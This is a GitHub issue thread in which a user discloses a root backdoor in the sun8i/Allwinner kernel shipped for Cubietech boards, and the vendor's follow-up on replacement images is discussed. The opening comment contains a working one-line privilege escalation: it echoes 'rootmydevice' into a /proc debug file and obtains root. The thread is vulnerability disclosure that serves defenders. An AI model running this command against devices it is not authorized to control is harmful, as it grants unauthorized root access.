Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Local privileges escalation on sun8i #2

Open
ThomasKaiser opened this issue Apr 30, 2016 · 8 comments

Comments

Projects
None yet
3 participants
@ThomasKaiser
Copy link

commented Apr 30, 2016

Are you affected too?

tk@bananapim3:~$ id
uid=1000(tk) gid=1000(tk) groups=1000(tk),20(dialout),27(sudo),29(audio),44(video),46(plugdev),108(netdev)
tk@bananapim3:~$ echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug 
tk@bananapim3:~$ id
uid=0(root) gid=0(root) groups=0(root),20(dialout),27(sudo),29(audio),44(video),46(plugdev),108(netdev),1000(tk)
@ThomasKaiser

This comment has been minimized.

Copy link
Author

commented May 12, 2016

Congratulations. By ignoring this that long you might also get some individual media attention soon: http://www.theregister.co.uk/2016/05/09/allwinners_allloser_custom_kernel_has_a_nasty_root_backdoor

@sunbeyond40

This comment has been minimized.

Copy link
Contributor

commented May 16, 2016

Hi ThomasKaiser, thanks for your notice. that is a serious problem.we have change the code to avoid it .

@ThomasKaiser

This comment has been minimized.

Copy link
Author

commented May 16, 2016

How many of your Cubietruck Plus customers are still affected by this exploit? Did you inform them, provide a new kernel package and new OS images?

@sunbeyond40

This comment has been minimized.

Copy link
Contributor

commented May 17, 2016

Of course, a new image is neccecssary to replace the old image, we are doing it in these days.

@SeeMirra

This comment has been minimized.

Copy link

commented Sep 6, 2016

Any updates on the new image?

@ThomasKaiser

This comment has been minimized.

Copy link
Author

commented Jul 25, 2017

Any updates on the new image?

Just checked on https://mega.nz/#F!0gREnYCQ!dBuYl9YgMP8r2Diw_BuStg!MlI0VZhA

CB5 images are dated back to 2016-04-11 which was 3 weeks before I reported the rootmydevice vulnerability to Cubietech:

 macbookpro-tk:~ tk$ 7z l /Users/tk/Downloads/linaro-server-cubietruck-plus-card-hdmi-v1.0.img.7z 
 
 7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
 p7zip Version 16.02 (locale=utf8,Utf16=on,HugeFiles=on,64 bits,4 CPUs x64)
 
 Scanning the drive for archives:
 1 file, 180786642 bytes (173 MiB)
 
 Listing archive: /Users/tk/Downloads/linaro-server-cubietruck-plus-card-hdmi-v1.0.img.7z
 
 --
 Path = /Users/tk/Downloads/linaro-server-cubietruck-plus-card-hdmi-v1.0.img.7z
 Type = 7z
 Physical Size = 180786642
 Headers Size = 199
 Method = LZMA:24
 Solid = -
 Blocks = 1
 
    Date      Time    Attr         Size   Compressed  Name
 ------------------- ----- ------------ ------------  ------------------------
 2016-04-11 09:59:49 ....A    889192448    180786443  linaro-server-cubietruck-plus-card-hdmi-v1.0.img
 ------------------- ----- ------------ ------------  ------------------------
 2016-04-11 09:59:49          889192448    180786443  1 files
@ThomasKaiser

This comment has been minimized.

Copy link
Author

commented Jul 25, 2017

Issue archived: https://archive.is/AXdsN

@SeeMirra

This comment has been minimized.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.